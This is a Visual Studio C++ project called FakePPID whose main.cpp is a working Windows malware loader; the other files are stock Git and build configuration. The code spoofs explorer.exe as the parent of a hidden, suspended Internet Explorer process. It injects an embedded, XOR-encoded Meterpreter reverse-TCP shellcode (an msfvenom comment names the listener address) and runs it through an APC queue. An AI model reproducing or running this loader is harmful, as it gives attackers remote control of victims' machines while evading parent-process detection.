├── .gitattributes
├── .gitignore
├── FakePPID.sln
└── FakePPID
├── FakePPID.vcxproj
├── FakePPID.vcxproj.filters
└── main.cpp
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
--------------------------------------------------------------------------------
/FakePPID.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FakePPID", "FakePPID\FakePPID.vcxproj", "{3523C906-A136-4599-8936-C0C32D872ECC}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x64.ActiveCfg = Debug|x64
17 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x64.Build.0 = Debug|x64
18 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x86.ActiveCfg = Debug|Win32
19 | {3523C906-A136-4599-8936-C0C32D872ECC}.Debug|x86.Build.0 = Debug|Win32
20 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x64.ActiveCfg = Release|x64
21 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x64.Build.0 = Release|x64
22 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x86.ActiveCfg = Release|Win32
23 | {3523C906-A136-4599-8936-C0C32D872ECC}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {88D2688F-D239-4F45-8CBD-9DDC86A9AD3A}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/FakePPID/FakePPID.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {3523C906-A136-4599-8936-C0C32D872ECC}
24 | FakePPID
25 | 10.0
26 |
27 |
28 |
29 | Application
30 | true
31 | v142
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v142
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v142
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v142
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | Level3
87 | true
88 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
89 | true
90 |
91 |
92 | Console
93 | true
94 |
95 |
96 |
97 |
98 | Level3
99 | true
100 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | true
102 | MultiThreaded
103 |
104 |
105 | Console
106 | true
107 |
108 |
109 |
110 |
111 | Level3
112 | true
113 | true
114 | true
115 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
116 | true
117 |
118 |
119 | Console
120 | true
121 | true
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 | MultiThreaded
134 |
135 |
136 | Console
137 | true
138 | true
139 | true
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
--------------------------------------------------------------------------------
/FakePPID/FakePPID.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
--------------------------------------------------------------------------------
/FakePPID/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 |
6 | DWORD FindExplorerPID() {
7 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
8 | PROCESSENTRY32 process = { 0 };
9 | process.dwSize = sizeof(process);
10 |
11 | if (Process32First(snapshot, &process)) {
12 | do {
13 | if (!wcscmp(process.szExeFile, L"explorer.exe"))
14 | break;
15 | } while (Process32Next(snapshot, &process));
16 | }
17 |
18 | CloseHandle(snapshot);
19 | return process.th32ProcessID;
20 | }
21 |
22 | int main() {
23 |
24 | //msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor_dynamic -i 14 LHOST=192.168.0.109 EXITFUNC=thread -f
25 | unsigned char shellcode[] = ("\xeb\x27\x5b\x53\x5f\xb0\x74\xfc\xae\x75\xfd\x57\x59\x53\x5e"
26 | "\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\x32\x3a"
27 | "\x74\x07\x80\x3e\x74\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
28 | "\xff\x3c\x03\x1a\x74\xd7\x24\x41\x6f\x5c\xaa\x3e\xff\xb4\x49"
29 | "\xfe\x4d\x65\x50\x44\xb6\x05\x2a\x3b\x4b\xe5\xfb\x4b\xe5\xfa"
30 | "\x65\x9b\x03\x46\x25\x48\x04\x9a\x02\x01\x6f\xd6\xe8\xfc\xc3"
31 | "\xe2\xf2\xe8\xfc\xe5\xc3\x19\x26\x3f\x01\xeb\x27\x5b\x53\x5f"
32 | "\xb0\x2f\xfc\xae\x75\xfd\x57\x59\x53\x5e\x8a\x06\x30\x07\x48"
33 | "\xff\xc7\x48\xff\xc6\x66\x81\x3f\xc8\x05\x74\x07\x80\x3e\x2f"
34 | "\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff\xff\x03\x1a\x0b\x2f"
35 | "\xe8\x3d\x50\x50\x45\xbb\xb5\xe6\xa5\x76\xe7\x5c\x5a\x49\x55"
36 | "\x89\x1c\x3b\x04\x52\xf4\xc4\x52\xf4\xc5\x7c\x8a\x3c\xf7\x5e"
37 | "\x77\x1d\x8b\x3d\xac\x7e\xe9\xf1\xed\xfc\xfb\xe3\xd7\xe5\xf4"
38 | "\xfc\x2d\x08\x19\xac\xd7\x27\x5b\x6f\x5f\xb0\x51\xfc\xae\x49"
39 | "\xfd\x57\x65\x53\x5e\xb6\x06\x30\x3b\x48\xff\xfb\x48\xff\xfa"
40 | "\x66\x81\x03\xf5\xa8\x48\x07\x80\x02\x6d\x75\xd6\xeb\xe6\xc3"
41 | "\xe1\xe8\xe8\xff\xff\xc3\x1a\x0e\x3f\x6d\xf1\x15\x58\x49\x6d"
42 | "\xb3\x6c\xce\xad\x6f\xcf\x54\x43\x61\x5d\x90\x34\x33\x1d\x7a"
43 | "\xfc\xdd\x7a\xfc\xdc\x54\x82\x25\xaa\xb2\x6e\x35\x83\x24\x44"
44 | "\x76\xf0\xd9\xe5\xe5\xd3\xeb\xce\xcd\xfc\xe5\x23\x20\x0b\x44"
45 | "\xf9\x1e\x78\x41\x66\x93\x17\xc5\x8d\x67\xc4\x74\x4b\x6a\x7d"
46 | "\x98\x3f\x13\x15\x71\xdc\xd5\x71\xdc\xd4\x5f\xa2\x2d\xca\x1d"
47 | "\x66\x3e\xa3\x2c\x3c\x56\xf8\xd2\xc5\xed\xd8\xcb\xc6\xc6\xdc"
48 | "\xed\x37\x22\x17\xdc\x05\x47\x6b\x72\xa3\x31\xde\xb2\x4d\xd0"
49 | "\x44\x6e\x71\x42\xb2\x2b\x23\x30\x6a\xe3\xff\x65\xec\xf1\x44"
50 | "\x9d\x07\xd3\xd7\x43\x25\x9c\x06\x2b\x66\xdd\xc9\xfa\xc7\xcc"
51 | "\xfb\xe3\xdd\xe3\xc7\x2c\x1d\x31\xc8\x35\x62\x70\x4d\x89\xc6"
52 | "\xee\x97\x56\xef\x6e\x7a\x41\x67\xa9\x14\x09\x24\x5a\xc6\xe4"
53 | "\x5a\xc6\xe5\x74\xb8\x1c\xbc\x8e\x57\x15\xb9\x1d\xf7\x4c\xc9"
54 | "\xf9\xdf\xdc\xf3\xd1\xf7\xed\xc6\xdc\x1c\x38\xc6\xf7\x1f\x76"
55 | "\x40\x68\x92\x49\xc4\x83\x66\xca\x75\x45\x6b\x73\x99\x31\x12"
56 | "\x1b\x70\xd2\xd4\x7f\xdd\xda\x5e\xac\x2c\xba\x8a\x68\x3f\xad"
57 | "\x2d\x62\x57\xf6\xd3\xcb\xec\xd6\xca\xc8\xc7\xd2\xec\x36\x2c"
58 | "\x49\xd2\x04\x49\x6a\x7c\xa2\xb4\xdf\xbc\x4c\xde\x45\x60\x70"
59 | "\x4c\xb3\x25\x22\x3e\x6b\xed\xfe\x6b\xed\xff\x45\x93\x06\x5a"
60 | "\x53\x4d\x24\x92\x07\xae\x67\xd3\xc8\xf4\xc6\xc2\xfa\xed\xdc"
61 | "\xed\xc6\x2d\x13\xb4\xc6\x34\x6c\x71\x43\x88\x17\xef\x99\x57"
62 | "\xe1\x6f\x74\x40\x69\xa8\x1a\x08\x2a\x5b\xc8\xe5\x54\xc7\xeb"
63 | "\x75\xb6\x1d\xb9\x69\x59\x14\xb7\x1c\x26\x4d\xc7\xf8\xd1\xdd"
64 | "\xfd\xd0\xf9\xec\xc8\xdd\x1d\x2a\x17\xf9\x02\x78\x5d\x66\x8f"
65 | "\x10\xd9\x8d\x7b\xc4\x68\x4b\x76\x7d\x84\x3f\x0f\x15\x6d\xdc"
66 | "\xc9\x71\xc0\xd4\x43\xa2\x31\x9b\xd8\x66\x22\xa3\x30\x3b\x4a"
67 | "\xf8\xce\xc5\xf1\xd8\xd7\xc6\xda\xdc\xf1\x1d\x3d\xdd\x26\x5c"
68 | "\x79\x42\xab\xa3\xfd\xa9\x5f\xe0\x4c\x6f\x52\x59\xa0\x1b\x2b"
69 | "\x31\x49\xf8\xed\x55\xe4\xf0\x67\x86\x15\x31\xe4\x42\x06\x87"
70 | "\x14\x88\x6e\xdc\xea\xe1\xd5\xfc\xf3\xe2\xfe\xf8\xd5\x0e\x8e"
71 | "\xd9\x5a\x97\xdd\xfe\xe0\xe9\x12\x14\x39\x4f\x59\x64\x42\x46"
72 | "\x68\x58\x40\x14\xc0\x71\x71\x85\x5a\x45\x5a\x9f\x6b\x16\x40"
73 | "\xae\x40\x34\x71\x85\x7a\x75\x5a\x1b\x8e\x44\x42\x68\x23\xdd"
74 | "\x71\x3f\xc8\x89\x2e\x75\x45\x0c\x24\x05\x53\xd5\xf0\x03\x49"
75 | "\x24\xd3\xf6\xd4\x5c\x49\x74\x5a\x9f\x6b\x2e\x83\x67\x2e\x5c"
76 | "\x38\xde\x6e\xa4\x6a\x0c\x32\x0c\x07\xa0\x60\x14\x39\x0e\x83"
77 | "\xa5\x9a\x14\x39\x0e\x40\xa0\xd2\x60\x5e\x46\x09\xf5\x42\x9f"
78 | "\x71\x16\x4c\xae\x52\x34\x70\x0f\xd8\xc6\x44\x5c\xc6\xc7\x49"
79 | "\xae\x26\x9c\x71\x0f\xde\x68\x23\xdd\x71\x3f\xc8\x89\x53\xd5"
80 | "\xf0\x03\x49\x24\xd3\x2c\xd9\x7b\xf9\x69\x11\x58\x1d\x06\x4d"
81 | "\x1c\xc3\x61\xe1\x56\x4c\xae\x52\x30\x70\x0f\xd8\x43\x53\x9f"
82 | "\x35\x46\x4c\xae\x52\x08\x70\x0f\xd8\x64\x99\x10\xb1\x46\x09"
83 | "\xf5\x53\x4c\x78\x56\x56\x7c\x48\x55\x61\x4f\x51\x64\x48\x5c"
84 | "\xba\xe2\x28\x64\x40\xeb\xd9\x56\x49\x7c\x48\x5c\xb2\x1c\xe1"
85 | "\x6e\xed\xeb\xc6\x53\x41\x9b\x65\x67\x0b\x51\x3b\x17\x12\x14"
86 | "\x78\x58\x41\xac\xf4\x5c\xb8\xe2\xa8\x24\x12\x14\x70\x87\xed"
87 | "\x6c\xae\x16\x39\x1f\x54\xe5\xba\x14\x5c\x4f\x5c\x6c\x9b\xf0"
88 | "\x75\x87\xf9\x64\xa8\x58\x4e\x28\x0f\xda\xc7\x58\xb0\xe4\x60"
89 | "\x24\x13\x14\x39\x57\x49\x9f\x3b\x94\x52\x0e\xf7\xf0\x78\x1e"
90 | "\x78\x50\x58\x75\x5f\x25\xf0\x43\x39\xe5\x5a\xeb\xf9\x46\x81"
91 | "\xe7\x5a\xeb\xf9\x46\x81\xe4\x53\xae\xd3\x01\xd7\xc5\xed\xc1"
92 | "\x71\x87\xcf\x4f\x02\x55\x61\x42\x81\xc7\x5a\x9d\xc0\x4f\xb2"
93 | "\xbc\xb7\x60\x58\xf1\xdd\xa0\xd2\x60\x33\x47\xf7\xeb\x67\xf1"
94 | "\xd1\x9d\x08\x25\x12\x5c\xba\xe2\x18\x6d\x9b\xf6\x74\x3f\xc1"
95 | "\x4f\x16\x55\x61\x46\x81\xdc\x53\xae\x3b\xd7\xc0\x7a\xed\xc1"
96 | "\xba\xf6\x08\x5b\x47\x5c\xba\xca\x28\x7b\x9b\xe2\x53\x4e\x49"
97 | "\x7c\x7a\x14\x29\x0e\x08\x64\x4a\x5c\xb0\xfc\x40\x14\xdb\x55"
98 | "\x83\x56\xac\x76\xf7\xeb\xec\x46\x81\xe6\x5b\x9d\xfe\x43\x39"
99 | "\xec\x5b\x9d\xc9\x46\x81\xff\x5a\x9d\xc0\x4f\xb2\x27\xcb\xdc"
100 | "\x66\xf1\xdd\xa6\xea\x14\x44\x26\x50\x64\x45\x4d\x51\x0e\x48"
101 | "\x25\x12\x55\x61\x64\x08\x7f\x53\xae\x32\x21\x07\x15\xed\xc1"
102 | "\x6e\x57\x49\x9f\x67\x7a\x74\x6f\xf7\xf0\x5b\xeb\xf7\xe7\x34"
103 | "\xda\xed\xeb\x71\x0f\xcb\x6d\x3b\xd2\x71\x8b\xfe\x50\xa6\x55"
104 | "\xc6\xe9\x50\x4f\x12\x4d\x82\xee\x15\x0f\x18\x55\xb0\xd4\xf7"
105 | "\xf0\x2d\xf8\xac\xde\x88\x42\x40\x62\x91\x90\x8d\xa5\xc9\xe6"
106 | "\xe1\x07\xaa\xb2\xf5\x94\xee\x4f\xc8\x05\x5f\x03\x32\x3a");
107 |
108 |
109 | STARTUPINFOEXA siex;
110 | PROCESS_INFORMATION piex;
111 | SIZE_T sizeT;
112 | siex.StartupInfo.cb = sizeof(STARTUPINFOEXA);
113 |
114 | HANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, FindExplorerPID());
115 |
116 | InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);
117 | siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);
118 | InitializeProcThreadAttributeList(siex.lpAttributeList, 1, 0, &sizeT);
119 | UpdateProcThreadAttribute(siex.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);
120 |
121 |
122 | CreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (LPSTARTUPINFOA)&siex, &piex);
123 |
124 | LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(piex.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
125 | WriteProcessMemory(piex.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);
126 | QueueUserAPC((PAPCFUNC)lpBaseAddress, piex.hThread, NULL);
127 | ResumeThread(piex.hThread);
128 | CloseHandle(piex.hThread);
129 |
130 | return 0;
131 | }
--------------------------------------------------------------------------------